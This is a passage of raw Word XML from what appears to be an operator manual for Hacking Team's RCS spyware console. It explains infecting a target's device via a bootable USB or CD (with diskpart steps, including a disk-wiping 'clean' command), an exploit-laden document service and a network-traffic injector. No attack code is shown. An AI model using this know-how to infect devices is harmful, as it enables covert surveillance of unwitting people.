        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="001C360F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Offline Installation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Agen</w:t>
      </w:r>
      <w:r w:rsidR="001C360F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t is available for 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> platforms: OSX and Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74AEE" w:rsidRPr="002D7F2D" w:rsidRDefault="00B74AEE" w:rsidP="00B74AEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B74AEE" w:rsidRPr="002D7F2D" w:rsidRDefault="007A365D" w:rsidP="00B74AEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49A84B91" wp14:editId="5867DE4E">
            <wp:extent cx="4050000" cy="3240000"/>
            <wp:effectExtent l="0" t="0" r="8255"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B74AEE" w:rsidRPr="002D7F2D" w:rsidRDefault="00B74AEE" w:rsidP="00B74AEE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B74AEE" w:rsidRPr="002D7F2D" w:rsidRDefault="0010013A" w:rsidP="00B74AEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5.5</w:t>
      </w:r>
      <w:r w:rsidR="00B74AEE" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] Operations &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B74AEE" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Operation #</w:t>
      </w:r>
      <w:r w:rsidR="00B74AEE" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B74AEE" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Target #</w:t>
      </w:r>
      <w:r w:rsidR="00B74AEE" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B74AEE" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Factory #</w:t>
      </w:r>
      <w:r w:rsidR="00B74AEE" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Build (</w:t>
      </w:r>
      <w:r w:rsidR="00B74AEE">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Offline Installation</w:t>
      </w:r>
      <w:r w:rsidR="00B74AEE" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74AEE" w:rsidRDefault="00B74AEE" w:rsidP="00B74AEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B74AEE" w:rsidRDefault="00B74AEE" w:rsidP="00B74AEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B74AEE" w:rsidRDefault="00B74AEE" w:rsidP="00B74AEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Depending on the Target’s platform, may be available sub-parameters to customize the infection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74AEE" w:rsidRDefault="00B74AEE" w:rsidP="00B74AEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These sub-parameters will be explained in detail during the training.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D3DBC" w:rsidRDefault="002D3DBC" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F46189" w:rsidRDefault="000541CB" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The bootable CD/DVD can be created simply burning the ISO file generated by RCS Console using a standard burning software or O.S. built-in feature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000541CB" w:rsidRDefault="000541CB" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000541CB" w:rsidRDefault="000541CB" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The bootable USB drive requires first to make the USB </w:t>
      </w:r>
      <w:r w:rsidR="00877814">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bootable.</w:t>
      </w:r>
      <w:r w:rsidR="00C91870">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D72B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>On the following page you can find a</w:t>
      </w:r>
      <w:r w:rsidR="00BE4FB8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> short </w:t>
      </w:r>
      <w:r w:rsidR="005D72B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">how-to for making a USB </w:t>
      </w:r>
      <w:r w:rsidR="00877814">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
      <w:r w:rsidR="005D72B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bootable, ready for this infection vector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D72B6" w:rsidRDefault="005D72B6" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D72B6" w:rsidRDefault="005D72B6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE4FB8" w:rsidRPr="00351F5F" w:rsidRDefault="00351F5F" w:rsidP="00351F5F">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc372642495"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>How to: Make a USB Disk Bootable</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00877814" w:rsidRDefault="00877814" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00877814" w:rsidRDefault="00BE4FB8" w:rsidP="00BE4FB8">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Plug a blank USB disk in the system and wait until Windows correctly detects and installs it’s drivers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE4FB8" w:rsidRDefault="00BE4FB8" w:rsidP="00BE4FB8">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open a shell and type</w:t>
      </w:r>
      <w:r w:rsidR="00102E97">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE4FB8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>diskpart</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list disk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00102E97">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and press enter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE4FB8" w:rsidRDefault="00BE4FB8" w:rsidP="00BE4FB8">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Check the USB disk number (usually “Disk 1”)</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select disk &lt;disk number&gt;</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clean</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create partition primary</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select partition 1</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active</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format fs=fat32 quick</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assign</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE4FB8" w:rsidRDefault="00BE4FB8" w:rsidP="00BE4FB8">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Type</w:t>
      </w:r>
      <w:r w:rsidR="00102E97">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE4FB8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE4FB8" w:rsidRDefault="00BE4FB8" w:rsidP="00BE4FB8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE4FB8" w:rsidRDefault="00BE4FB8" w:rsidP="00BE4FB8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Requirements: Windows Vista/7/8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE4FB8" w:rsidRDefault="00BE4FB8" w:rsidP="00BE4FB8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE4FB8" w:rsidRDefault="00BE4FB8" w:rsidP="00BE4FB8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The USB disk is now bootable and you can copy files you want to automatically run when the system starts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D72B6" w:rsidRDefault="005D72B6" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D72B6" w:rsidRDefault="005D72B6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D3DBC" w:rsidRDefault="002D3DBC" w:rsidP="005E4792">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc372642496"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploit Explanation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w:rsidR="002D3DBC" w:rsidRDefault="002D3DBC" w:rsidP="002D3DBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00325EDB" w:rsidRDefault="00D15763" w:rsidP="00D15763">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00951CCB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Agent allows </w:t>
      </w:r>
      <w:r w:rsidR="00375BBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to create an executable or document file suitable for the selected platform </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that will install the infection vector on the Target’s device as soon as </w:t>
      </w:r>
      <w:r w:rsidR="00375BBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the file is opened, exploiting spe</w:t>
      </w:r>
      <w:r w:rsidR="00325EDB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cific software vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00325EDB" w:rsidRDefault="00325EDB" w:rsidP="00D15763">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D15763" w:rsidRPr="002D7F2D" w:rsidRDefault="00D15763" w:rsidP="00D15763">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00BC2EFA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Agent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is available for</w:t>
      </w:r>
      <w:r w:rsidR="00BC2EFA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 platforms: OSX and Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D15763" w:rsidRPr="002D7F2D" w:rsidRDefault="00D15763" w:rsidP="00D15763">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D15763" w:rsidRPr="002D7F2D" w:rsidRDefault="00B67123" w:rsidP="00D15763">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23C82E01" wp14:editId="5199A3C5">
            <wp:extent cx="4050000" cy="3240000"/>
            <wp:effectExtent l="0" t="0" r="8255"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D15763" w:rsidRPr="002D7F2D" w:rsidRDefault="00D15763" w:rsidP="00D15763">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D15763" w:rsidRPr="002D7F2D" w:rsidRDefault="0010013A" w:rsidP="00D15763">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5.6</w:t>
      </w:r>
      <w:r w:rsidR="00D15763" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] Operations &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00D15763" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Operation #</w:t>
      </w:r>
      <w:r w:rsidR="00D15763" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00D15763" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Target #</w:t>
      </w:r>
      <w:r w:rsidR="00D15763" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00D15763" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Factory #</w:t>
      </w:r>
      <w:r w:rsidR="00D15763" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Build (</w:t>
      </w:r>
      <w:r w:rsidR="00951CCB">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r w:rsidR="00D15763" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D3DBC" w:rsidRDefault="002D3DBC" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F46189" w:rsidRDefault="00F46189" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F46189" w:rsidRDefault="00F46189" w:rsidP="00F46189">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For security reasons, the generation of exploited documents is no more available within the RCS Console.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F46189" w:rsidRDefault="00F46189" w:rsidP="00F46189">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F46189" w:rsidRDefault="00F46189" w:rsidP="00F46189">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The request must be sent to the Hacking Team Support Team through the Support Portal, opening a new ticket and sending 2 files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F46189" w:rsidRDefault="00F46189" w:rsidP="00F46189">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F46189" w:rsidRDefault="00F46189" w:rsidP="00F46189">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A S</w:t>
      </w:r>
      <w:r w:rsidR="0010013A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ilent Installer Agent (see page 40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F46189" w:rsidRDefault="00F46189" w:rsidP="00F46189">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The original document (e.g. Word, PowerPoint) to be exploited;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F46189" w:rsidRDefault="00F46189" w:rsidP="00F46189">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F46189" w:rsidRDefault="00F46189" w:rsidP="00F46189">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F46189" w:rsidRDefault="00F46189" w:rsidP="00F46189">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The final exploited file will be sent back to the client inside the Support Portal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F46189" w:rsidRDefault="00F46189">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D3DBC" w:rsidRDefault="002D3DBC" w:rsidP="005E4792">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc372642497"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Network Injector Explanation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="002D3DBC" w:rsidRDefault="002D3DBC" w:rsidP="002D3DBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00163021" w:rsidRPr="006954F7" w:rsidRDefault="00667412" w:rsidP="00667412">
      <w:r w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Injector Agent allows </w:t>
      </w:r>
      <w:r w:rsidR="00163021">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to install </w:t>
      </w:r>
      <w:r w:rsidR="00163021" w:rsidRPr="006954F7">
        <w:t>the infection vector on the Target’s device modifying its network traffic on-the-fly, acting on data downloaded from Target’s device.</w:t>
      </w:r>
    </w:p>
